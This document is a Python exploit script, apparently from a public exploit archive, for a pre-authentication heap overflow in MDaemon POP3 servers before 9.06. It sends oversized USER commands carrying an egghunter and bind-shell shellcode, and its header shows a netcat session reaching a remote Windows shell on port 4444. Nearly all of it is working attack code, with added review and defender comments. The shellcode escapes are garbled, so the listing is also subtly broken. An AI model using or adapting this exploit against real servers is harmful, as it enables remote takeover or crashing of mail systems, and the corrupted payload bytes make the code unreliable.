
# Title : MDaemon POP3 Server < 9.06 (USER) Remote Heap Overflow Exploit
# Published : 2006-08-26
# Author : muts


#!/usr/bin/python
import sys
import struct
import socket
from time import sleep
########################################################################################
# MDaemon Pre Authentication (USER) Heap Overflow 
# Code based on Leon Juranic's exploit
# Coded by muts - mati@see-security.com
# http://www.hackingdefined.com
# http://www.remote-exploit.org
# Tested on:
# 	Mdaemon 9.0.5
# 	Mdaemon 7.2.3
# 	Mdaemon 7.2.2
# 	Mdaemon 7.2.1
# 	Mdaemon 7.2.0
#		Possibly Others
#		PLEASE CONTINUE READING !
# Huge greets to xbxice and talz for leading me away from the darkness
########################################################################################
# Mdaemon is weird. It seems like their developers decided to annoy everyone
# by making their software do unexpected things.
# The exploit overwrites UnhandledExceptionFilter, and jumps to an egghunter
# shellcode - which then scans the memory, and executes a bindshell on port 4444.
# 
# On some Win2k SP4 machines, I found SetUnhandledExceptionFilter at 0x00000214,
# for which I unfortunately had no explanation.
# I later found out that these machines were fully patched ...
# After inspecting kernel32.dll from my SP4 (not fully patched) and comparing it to 
# today's version, I noticed that the SetUnhandledExceptionFilter function had changed, 
# and looks suspiciously similar to XP SP2... 
# Note that my unpatched win2k was last patched 2-3 weeks ago, 
# so I suspect this change is recent.
# The end of easy UnhandledExceptionFilter exploitation on Win2k ?
#
# So, this is a partially working exploit, on unpatched win2k boxes....
# Kiddies, treat this exploit as DOS :)
#
# I got 3 types of results with this code:
#
# 1. Shell :)	
# 2. Mdaemon process shoots up to 100%, scanning memory for shellcode that isn't there.
# 3. Plain ugly crash - oh well.
#
# At minimum, I'd check the UnhandledExceptionFilter address before running the exploit.
######################################################################################## 
# 
# C:\Documents and Settings\muts>nc -v 192.168.220.128 4444
# 97DACBEC7CA4483 [192.168.220.128] 4444 (?) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
# 
# C:\MDaemon\APP>
########################################################################################

# Target address. Hard-coded to a private (RFC 1918) lab host; the only
# network endpoint this script ever talks to is <host>:110 (POP3).
host="192.168.220.128"

# Little-endian 32-bit values that get spliced into the USER argument.
# All three are absolute addresses taken from one specific Win2k SP4 image;
# the header explains that a patched kernel32.dll shifted
# SetUnhandledExceptionFilter, which is why the script is build-specific and
# degrades to a plain crash (i.e. a DoS) anywhere else.
ret = struct.pack("<L",0x7c2f62b6)	# 7c2f62b6 advapi.dll JMP ESI+48 SP4 No Patches
ueh = struct.pack("<L",0x7C54144C)	# SetUnhandledExceptionFilter 0x7C54144C win2k SP4 No Patches
tap = struct.pack("<L",0xeb169090)  	# Short Jump over some garbage

# skape's egghunter shellcode 
# First-stage payload. Per the header, it scans process memory for the tag
# carried by the main payload and transfers control there.
# NOTE(review): the byte escapes in this listing are garbled by extraction
# (no backslash before each "x.."), so as written these are plain ASCII
# string literals and do not encode the bytes the comment above describes.
# The listing is preserved as-is.

egghunter  ="xebx21x59xb8x74x30x30x77x51x6axffx33xdbx64x89x23"
egghunter +="x6ax02x59x8bxfbxf3xafx75x07xffxe7x66x81xcbxffx0f"
egghunter +="x43xebxedxe8xdaxffxffxffx6ax0cx59x8bx04x0cxb1xb8"
egghunter +="x83x04x08x06x58x83xc4x10x50x33xc0xc3"

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
# Main payload: a bind shell on TCP 4444 (see the nc transcript in the
# header). The leading bytes carry the "t00wt00w" tag that the egghunter
# looks for. Same transcription caveat as the egghunter: the escapes are
# garbled here too, so this is ASCII text rather than the 709-byte payload.
# Defender note: the observable signs listed in the header are the ones to
# watch for on a mail server - a new listener on 4444, the MDaemon process
# pinned at 100% CPU, or an outright crash shortly after oversized,
# unauthenticated POP3 USER commands.

shellcode  ="x90x90x74x30x30x77x74x30x30x77" # t00wt00w (!)
shellcode +="xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
shellcode +="x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
shellcode +="x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
shellcode +="x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
shellcode +="x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e"
shellcode +="x4dx44x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx38"
shellcode +="x4ex46x46x52x46x42x4bx48x45x34x4ex53x4bx48x4ex57"
shellcode +="x45x50x4ax47x41x50x4fx4ex4bx58x4fx54x4ax41x4bx48"
shellcode +="x4fx45x42x52x41x30x4bx4ex49x34x4bx58x46x33x4bx48"
shellcode +="x41x30x50x4ex41x43x42x4cx49x39x4ex4ax46x38x42x4c"
shellcode +="x46x57x47x50x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e"
shellcode +="x46x4fx4bx53x46x45x46x32x4ax52x45x37x45x4ex4bx38"
shellcode +="x4fx35x46x52x41x30x4bx4ex48x36x4bx58x4ex30x4bx54"
shellcode +="x4bx58x4fx45x4ex31x41x50x4bx4ex43x50x4ex42x4bx38"
shellcode +="x49x58x4ex46x46x52x4ex31x41x46x43x4cx41x53x4bx4d"
shellcode +="x46x56x4bx58x43x44x42x33x4bx48x42x54x4ex30x4bx38"
shellcode +="x42x57x4ex51x4dx4ax4bx58x42x54x4ax50x50x45x4ax46"
shellcode +="x50x48x50x34x50x30x4ex4ex42x35x4fx4fx48x4dx48x56"
shellcode +="x43x35x48x46x4ax56x43x43x44x43x4ax36x47x47x43x57"
shellcode +="x44x33x4fx45x46x45x4fx4fx42x4dx4ax46x4bx4cx4dx4e"
shellcode +="x4ex4fx4bx53x42x55x4fx4fx48x4dx4fx55x49x38x45x4e"
shellcode +="x48x36x41x58x4dx4ex4ax30x44x30x45x55x4cx36x44x50"
shellcode +="x4fx4fx42x4dx4ax46x49x4dx49x30x45x4fx4dx4ax47x55"
shellcode +="x4fx4fx48x4dx43x45x43x55x43x45x43x35x43x55x43x34"
shellcode +="x43x45x43x44x43x45x4fx4fx42x4dx48x36x4ax56x41x51"
shellcode +="x4ex35x48x46x43x35x49x38x41x4ex45x39x4ax46x46x4a"
shellcode +="x4cx51x42x37x47x4cx47x35x4fx4fx48x4dx4cx36x42x51"
shellcode +="x41x35x45x55x4fx4fx42x4dx4ax56x46x4ax4dx4ax50x42"
shellcode +="x49x4ex47x35x4fx4fx48x4dx43x35x45x55x4fx4fx42x4d"
shellcode +="x4ax46x45x4ex49x44x48x48x49x34x47x55x4fx4fx48x4d"
shellcode +="x42x35x46x35x46x35x45x45x4fx4fx42x4dx43x49x4ax56"
shellcode +="x47x4ex49x57x48x4cx49x47x47x55x4fx4fx48x4dx45x45"
shellcode +="x4fx4fx42x4dx48x56x4cx56x46x56x48x56x4ax46x43x46"
shellcode +="x4dx46x49x38x45x4ex4cx46x42x55x49x55x49x32x4ex4c"
shellcode +="x49x38x47x4ex4cx36x46x34x49x58x44x4ex41x33x42x4c"
shellcode +="x43x4fx4cx4ax50x4fx44x34x4dx52x50x4fx44x34x4ex42"
shellcode +="x43x59x4dx58x4cx57x4ax53x4bx4ax4bx4ax4bx4ax4ax56"
shellcode +="x44x37x50x4fx43x4bx48x51x4fx4fx45x47x46x44x4fx4f"
shellcode +="x48x4dx4bx35x47x45x44x55x41x55x41x55x41x55x4cx56"
shellcode +="x41x50x41x45x41x35x45x45x41x55x4fx4fx42x4dx4ax56"
shellcode +="x4dx4ax49x4dx45x50x50x4cx43x45x4fx4fx48x4dx4cx46"
shellcode +="x4fx4fx4fx4fx47x43x4fx4fx42x4dx4bx58x47x55x4ex4f"
shellcode +="x43x38x46x4cx46x36x4fx4fx48x4dx44x35x4fx4fx42x4d"
shellcode +="x4ax46x42x4fx4cx48x46x50x4fx35x43x55x4fx4fx48x4d"
shellcode +="x4fx4fx42x4dx5a"

# USER argument for the second stage: three bytes of padding, the short jump,
# four more bytes of padding, the two packed addresses, a run of 90 "x90"
# escapes (garbled in this transcription, like the payload strings), the
# egghunter and 346 bytes of trailing filler. Its length is fixed by these
# literal counts. Note that `buffer` shadows the Python 2 builtin of the
# same name; harmless here, but worth knowing when reading the rest.
buffer ="AAA"+tap+"BBBB"+ret+ueh+"x90"*90 +egghunter+"C"*346

# Stage 1: five throw-away POP3 sessions. Each reads the server banner,
# sends a single pre-authentication USER command whose argument is tens of
# kilobytes of filler wrapped around the bind-shell payload, sends QUIT, and
# pauses a second. Nothing is read back after USER, so a server that simply
# drops the connection goes unnoticed here. Python 2 syntax (print statement).
# Defender note: no credentials are involved at any point - an unauthenticated
# USER argument of this size is far outside any legitimate POP3 client's
# behaviour and is the simplest thing to alert on in the POP3 log or a
# network IDS. Per the title, MDaemon releases before 9.06 are the ones
# affected.
for x in range(5):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((host,110))
	data=s.recv(1024)
	print data    # server greeting banner
	s.send('USER '+'@A' * 1600 + 'x90'*5945 + shellcode +'D'*3711 + 'rn') 
	s.send('QUITrn')
	s.close()
	sleep(1)

# Stage 2, first attempt: one session that sends the overflow buffer built
# above as the USER argument, reads and prints one reply so the operator can
# see how the server reacted, then sends a second USER of 3370 'A's and closes
# without reading anything further. Presumably the second USER is what
# provokes the fault after the first one has corrupted the heap (inferred
# from the header's description, not visible in this code - TODO confirm).
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,110))
data=s.recv(1024)
print data    # server greeting banner
s.send('USER ' + '@A@A'+ buffer + 'rn')
data=s.recv(1024)
print data    # server's reply to the oversized USER
s.send('USER ' + 'A' * 3370 + 'rn')
s.close()

# Stage 2, second attempt: a verbatim copy of the session immediately above
# (same buffer, same follow-up USER), ending with a one-second pause. The
# header explains that the outcome on the target is one of three things -
# shell, a runaway process at 100% CPU, or a crash - which is also what an
# operator on the receiving end would see. In a rewrite the two copies would
# be a loop; left as-is here.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,110))
data=s.recv(1024)
print data    # server greeting banner
s.send('USER ' + '@A@A'+ buffer + 'rn')
data=s.recv(1024)
print data    # server's reply to the oversized USER
s.send('USER ' + 'A' * 3370 + 'rn')
s.close()
sleep(1)
